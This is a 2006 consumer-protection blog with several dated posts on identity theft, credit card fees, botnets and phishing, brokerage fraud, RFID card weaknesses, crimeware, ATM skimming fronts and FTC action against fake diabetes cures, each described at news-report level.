Saturday, October 28, 2006

A Hidden Cost of Identity Theft - "Credit Card Gotchas"

Just got my copy of the Consumers Union newsletter and they did an interesting article about "credit card gotchas."

Here is what they had to say:

The bank can change the interest rate and other terms at any time, for no reason, and you get stuck with a higher interest rate on purchases you already made. You mail the bill before it's due, but get hit with a late fee anyway. You sign up for a 7% interest rate, but it goes to 27% if you bounce a check, go over the limit, or miss payments.

Congressional elections are coming up. Let’s tell our members of Congress -and their challengers- that we want better treatment. Demand sensible reforms for credit cards!

These credit card "gotchas" aren't just happening to you. A recent Government Accountability Office report shows that one fifth of credit card holders pay an interest rate of 20% or more. Even if you have a lower rate, it can go up at any time, for no reason. The report also found in just a year, more than one third of consumers were charged a late fee averaging $34! And, credit card companies are still raising interest rates based on whether the consumer missed a payment to a different creditor. Every year, bills to reform credit card practices are introduced but not passed. To learn more, click here.

Link to Consumer Union article, here.

This made me wonder how many times a victim of identity theft is hit with higher interest rates because they were compromised and negative data was erroneously (wrongfully) put on their credit report?

The answer is probably pretty scary and how much "extra revenue" could financial institutions be making as a result of this?

Then consider how much personal and financial information has been breached at financial institutions - where "everything was kept as quiet as possible" and we were told the victims were compensated.

As I've said before -- no business is in the business of losing money -- and the costs associated with fraud (in reality) are passed on to everyone.

Perhaps if more "sensible laws" on this matter were passed - financial institutions would have to protect people's personal and financial information a little better to maintain their profitability?

The latest tally of people breached (courtesy of the Privacy Rights Clearinghouse) is 95,000,000 - and some might argue - when we see those being breached "being very tight-lipped," the true figure might be higher.

Here is a post, I did on how fraud costs are misplaced:

Are We Addressing Cyber Crime from the Wrong End

Are the Phishermen Planning a Christmas Offensive?

Vnuet is reporting that security experts have noted a massive botnet (1,000,000 compromised PCs) being formed and the suspicion is that it will be used for a holiday season (Christmas) attack on Internet consumers.

"No one knows yet exactly what nefarious activity the army of captive PCs will be used for. But the chances are it will be a massive onslaught of phishing aimed at defrauding web consumers in the run up to Christmas."

Story, here.

Historically, criminals take advantage of the Christmas season due to the sheer volume of transactions - which makes it easier for them to disguise their activity.

According to Wikipedia, a botnet is "a jargon term for a collection of software robots, or bots, which run autonomously. This can also refer to the network of computers using distributed computing software."

In less technical terms, Internet criminals take over people's systems and then use them to launch spam and scams without the owner's knowledge.

According to the report - no one is certain who is behind the botnet being assembled - or exactly what the intention is. Less than effective protection (security) is normally the reason a computer can be compromised.

If the intention is phishing - the Anti-Phishing Working Group has a great page on their site on how the average person can avoid these scams, here.

Thursday, October 26, 2006

Online Brokerage Scams are a Sign of a Bigger Problem

A couple of weeks ago, I did a post on "Cyber Crooks Targeting Online Brokerages." Now more information is being released on this latest financial crimes target.

Courtesy of Linda Epstein at Blogging Stocks:

"E*Trade reported on a conference call last week that it spent $18 million in the third quarter to compensate customers affected by trading fraud, according to a report from Bloomberg. TD Ameritrade also admitted to losses, but gave no numbers. We may get more details when it reports its numbers, expected later today. Charles Schwab told Bloomberg that it didn't see "anything unusual enough to warrant a financial disclosure." Well, if I were a Schwab customer and my account were infiltrated, I certainly would consider it important enough for disclosure. I hope Schwab is being more candid with its customers. Fidelity did not comment on Bloomberg's story."

Blogging Stocks article, here.

InformationWeek did another article with good information about this, here.

According to the articles, accounts are being used in "pump and dump" schemes after personal computers are compromised with crimeware.

Wikipedia describes a "pump and dump" scheme as "a term used to describe a form of financial fraud that typically involves artificially inflating the price of a stock or other security through promotion, in order to sell at the inflated price (creating artificial demand)."

The InformationWeek article, also mentions that money is being stolen directly from accounts.

It seems that some of the brokers are disclosing their problems and some aren't. Thus far, victims are being compensated, however (in reality) fraud costs are normally passed on to the consumer.

Corporations aren't in business to lose money.

The InformationWeek article mentions law enforcement's frustration that a lot of these incidents aren't reported, or are being "underreported."

They also mention that only a "handful" of States have laws on the books to address "phishing" and that our legislators can't agree on a Federal law.

Until we enact the necessary legislation and give law enforcement "full cooperation," the criminals behind this will be "laughing all the way to the bank."

Wednesday, October 25, 2006

Are RFID Credit Cards Safe?

The RFID ConsortiUm for Security and Privacy (CUSP) has issued a study about vulnerabilities in first-generation RFID-enabled credit cards.

In their blog, Ari Juels writes:

Consumers in the United States today carry some twenty million or so credit cards and debit cards equipped with RFID (Radio-Frequency IDentification) chips. RFID chips communicate transaction data over short distances via radio. They eliminate the need to swipe cards or hand them to merchants. Consumers can instead make payments simply by waving their cards—or even just their wallets—near point-of-sale terminals.

While appealing to both consumers and merchants, the convenience of RFID credit cards has a flip side. What a legitimate merchant terminal can read, a malicious scanning device can also read without a consumer’s consent or knowledge. RFID credit cards therefore call for particularly careful security design.

Blog post, here.

In a "nutshell," the study warns that current RFID credit cards are vulnerable to having the identities of the cardholder scanned from afar and the information could also be used in credit/debit card skimming.

They also state that this can be accomplished without great technical difficulty and that "slightly stronger data protections and cryptography would largely prevent the problems they discovered."

The study admits that "card skimming" is already a big problem, therefore these cards are unlikely to change anything that isn't already going on.

My question is when will we start developing technology that will protect the consumer instead of developing technology that will "probably" add to the problem?

There is an interesting demonstration posted by RFID-CUSP on YouTube about this, here.

Here is a previous post, I did on RFID:

RFID, A Necessary Evil; or an Invasion of Privacy?

Tuesday, October 24, 2006

The State of Crimeware on the Internet

"Crimeware," according to Wikipedia was a term coined by Peter Cassidy of the Anti-Phishing Working Group as a "type of computer program or suite of computer programs that are designed specifically to automate financial crime."

Last week, the US Department of Homeland Security, SRI International Identity Theft Technology Council and the Anti-Phishing Working Group issued a pretty telling report about how crimeware is being used to commit financial crimes and identity theft.

From the executive summary, here is how crimeware is used by Internet criminals:

Crimeware is software that performs illegal actions unanticipated by a user running the software, which are intended to yield financial benefits to the distributor of the software.

Crimeware is a ubiquitous fact of life in modern online interactions. It is distributed via many mechanisms, including:

  • Social engineering attacks convincing users to open a malicious email attachment containing crimeware;
  • Injection of crimeware into legitimate web sites via content injection attacks such as cross-site scripting;
  • Exploiting security vulnerabilities through worms and other attacks on security flaws in operating systems, browsers, and other commonly installed software; and
  • Insertion of crimeware into downloadable software that otherwise performs
    a desirable function.

Full report, here.

Recently, we've read about organized crime groups employing "highly technical personnel" and carder rooms - where financial information is bought and sold.

A recent USA Today story about "carder forums" quoted the following statistics:

$67.2 billion: FBI estimate of what U.S. businesses lose annually because of computer-related crimes.

$8 billion: Consumer Reports estimate of what U.S. consumers lost the past two years because of viruses, spyware and Internet scams.

93.8 million: Privacy Rights Clearinghouse's count of personal records reported lost or stolen since February 2005.

26,150: The Anti-Phishing Working Group's count of unique variations of phishing scams reported in August 2006.

Crimeware and the Internet are fueling the identity theft problem - which in turn could threaten the stability of our financial systems. Some even say, might be a National Security issue, also.

In the rapidly changing world of technology, laws have failed to keep pace. Perhaps with the upcoming elections, it's time for all of us to examine what our political representatives are doing about this problem.

We might find that we all have a common interest on this issue!

Monday, October 23, 2006

Romanian Illegal Immigrants Install ATM (Fraud) Machines

(Older picture of a skimming device)

Illegal immigration isn't a "victimless crime" and the work they are performing doesn't always help the economy. Apparently Romanian illegal immigrants are installing fake ATM fronts - used to steal debit-card details - for the very same criminal organizations that helped them get into the United Kingdom, illegally.

Justin Penrose of the Sunday Mirror (UK) is reporting:

They have developed a high-tech ATM front which looks exactly like the original - and it steals a victim's details in seconds.

The new cashpoint fascia is so convincing that gangs are selling it to other crooks for £10,000 a time.

The covers even have a sticker which warns customers to watch out for fraudsters. When a victim uses an ATM it records details while a camera videos the pin number. Within seconds these details are sent to a laptop and a cloned card is made. Several wealthy Romanian "godfathers" run crooked empires from their mansions in the Balkans.

Sunday Mirror story, here.

The article also states that these new and very convincing ATM fronts are being produced and sold to other criminal organizations.

I wonder how long it will be before this new "skimming device" is exported from the United Kingdom? In the past couple of years, debit-card fraud has become a worldwide problem.

This reminds me that the best defense against ATM skimming is to always cover your PIN when doing a transaction!

Here is a previous post about the growing problem of debit-card fraud:

Debit Card Breaches, A Growing Problem

And here is an older post, I did (with pictures) of a skimming device:

ATM Machines That Clone Your Card

If anyone has a picture of one of these new devices, please send it to

Sunday, October 22, 2006

FTC Addresses Fake Diabetes Cures

We all get spam hawking miracle weight loss products and the "like," but here is something a little more serious.

Now fraudulent websites are offering bogus products claiming to cure diabetes.

From the FTC press release:

The Federal Trade Commission (FTC) and the Food and Drug Administration (FDA), working with government agencies in Mexico and Canada, have launched a drive to stop deceptive Internet advertisements and sales of products misrepresented as cures or treatments for diabetes. The ongoing joint campaign has so far included approximately 180 warning letters and other advisories sent to online outlets in the three countries.

“We will continue working with our partners in the U.S. and internationally to make sure scammers have no place to hide,” said Lydia Parnes, Director of the FTC’s Bureau of Consumer Protection. “The Internet can be a great source of information, but it also is a billboard for ads that promise miracle cures for diabetes and other serious diseases. Our advice to consumers: ‘Be smart, be skeptical’ when evaluating health claims online."

FTC press release, here.

Diabetes is a serious ailment that can lead to life threatening complications if not treated properly.

Wikipedia has information on the disease, here.